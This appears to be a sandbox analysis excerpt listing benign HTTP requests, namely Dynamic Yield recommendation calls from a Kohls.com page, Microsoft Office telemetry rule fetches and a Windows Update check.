Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=rB4ZFvGS/ZvRig0eMMS8rdNmfZVgx3Rfj2g7RT9JqJ6G3t4qGlbjhW9Ch27Aqsk/3x6ETGkiIL0FDbPEzmtjvnoqtuUNTHbFG0WfZRpzp4Waa9Q9Z5DHej6APbHo; AWSALBCORS=rB4ZFvGS/ZvRig0eMMS8rdNmfZVgx3Rfj2g7RT9JqJ6G3t4qGlbjhW9Ch27Aqsk/3x6ETGkiIL0FDbPEzmtjvnoqtuUNTHbFG0WfZRpzp4Waa9Q9Z5DHej6APbHoIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=gBbTr50zB5ETHLkx/HuXwIHLoofK/WLHDL9PmakqMrDlTtHU5VDFU8kSRSkA2fMY3WNflU0jqhpvABlfLFUlyU7qu+l4UzC4NRvmnjAhCi8u2G7sASJM+RSxeC0i; AWSALBCORS=gBbTr50zB5ETHLkx/HuXwIHLoofK/WLHDL9PmakqMrDlTtHU5VDFU8kSRSkA2fMY3WNflU0jqhpvABlfLFUlyU7qu+l4UzC4NRvmnjAhCi8u2G7sASJM+RSxeC0iIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=gBbTr50zB5ETHLkx/HuXwIHLoofK/WLHDL9PmakqMrDlTtHU5VDFU8kSRSkA2fMY3WNflU0jqhpvABlfLFUlyU7qu+l4UzC4NRvmnjAhCi8u2G7sASJM+RSxeC0i; AWSALBCORS=gBbTr50zB5ETHLkx/HuXwIHLoofK/WLHDL9PmakqMrDlTtHU5VDFU8kSRSkA2fMY3WNflU0jqhpvABlfLFUlyU7qu+l4UzC4NRvmnjAhCi8u2G7sASJM+RSxeC0iIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=BmVtT0Ip3YKHc+Wek6vpqGgMqxRAKxnylN98dZl+2LwI5KIuPigxyk/j7X8EucsHPD4fVyfw5MWHPwW5eIv87XwXuNVl9nNtYYIOPyytdlPCUOiH/f2wZP51aBos; AWSALBCORS=BmVtT0Ip3YKHc+Wek6vpqGgMqxRAKxnylN98dZl+2LwI5KIuPigxyk/j7X8EucsHPD4fVyfw5MWHPwW5eIv87XwXuNVl9nNtYYIOPyytdlPCUOiH/f2wZP51aBosIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=QJSIxCMhTJcyhWVeI98U27U8X84fyBkKqB/C856M8SLyMTwTs/X6cb6dB1liUYwQOdg9ho8F7mUvwckRSVuA8UgFnuTyBwJY6AY3OooPYB4Jt+CM6xtmFZh7gy8E; AWSALBCORS=QJSIxCMhTJcyhWVeI98U27U8X84fyBkKqB/C856M8SLyMTwTs/X6cb6dB1liUYwQOdg9ho8F7mUvwckRSVuA8UgFnuTyBwJY6AY3OooPYB4Jt+CM6xtmFZh7gy8EIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=MGG2mpSAltYVC4R&MD=3aPuGXPU HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=QJSIxCMhTJcyhWVeI98U27U8X84fyBkKqB/C856M8SLyMTwTs/X6cb6dB1liUYwQOdg9ho8F7mUvwckRSVuA8UgFnuTyBwJY6AY3OooPYB4Jt+CM6xtmFZh7gy8E; AWSALBCORS=QJSIxCMhTJcyhWVeI98U27U8X84fyBkKqB/C856M8SLyMTwTs/X6cb6dB1liUYwQOdg9ho8F7mUvwckRSVuA8UgFnuTyBwJY6AY3OooPYB4Jt+CM6xtmFZh7gy8EIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=zr9GHiXrCsPYEhKqHmcvwjvVEdmkx0v7g1tFWfAeJF0OkQTYSn6ow3fXhMURMOsimGPIqdER8uCwbyQtdlQKNG4Y/uCUf7oppfcE8HBnosQQyDIjqjGaN61mjiGi; AWSALBCORS=zr9GHiXrCsPYEhKqHmcvwjvVEdmkx0v7g1tFWfAeJF0OkQTYSn6ow3fXhMURMOsimGPIqdER8uCwbyQtdlQKNG4Y/uCUf7oppfcE8HBnosQQyDIjqjGaN61mjiGiIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=zr9GHiXrCsPYEhKqHmcvwjvVEdmkx0v7g1tFWfAeJF0OkQTYSn6ow3fXhMURMOsimGPIqdER8uCwbyQtdlQKNG4Y/uCUf7oppfcE8HBnosQQyDIjqjGaN61mjiGi; AWSALBCORS=zr9GHiXrCsPYEhKqHmcvwjvVEdmkx0v7g1tFWfAeJF0OkQTYSn6ow3fXhMURMOsimGPIqdER8uCwbyQtdlQKNG4Y/uCUf7oppfcE8HBnosQQyDIjqjGaN61mjiGiIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=cbv4Ra4OIR7Xt4CzHbzqPulWXPiXJ0j4ps0u3bY4S29zWBUAZrUYH+NU/pL21HDhtehNy+rwc+txBU9NR5L8z8XS0dDq3IJ05NglWQ1QpW/OZOAVjg/4LzAKiKQd; AWSALBCORS=cbv4Ra4OIR7Xt4CzHbzqPulWXPiXJ0j4ps0u3bY4S29zWBUAZrUYH+NU/pL21HDhtehNy+rwc+txBU9NR5L8z8XS0dDq3IJ05NglWQ1QpW/OZOAVjg/4LzAKiKQdIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
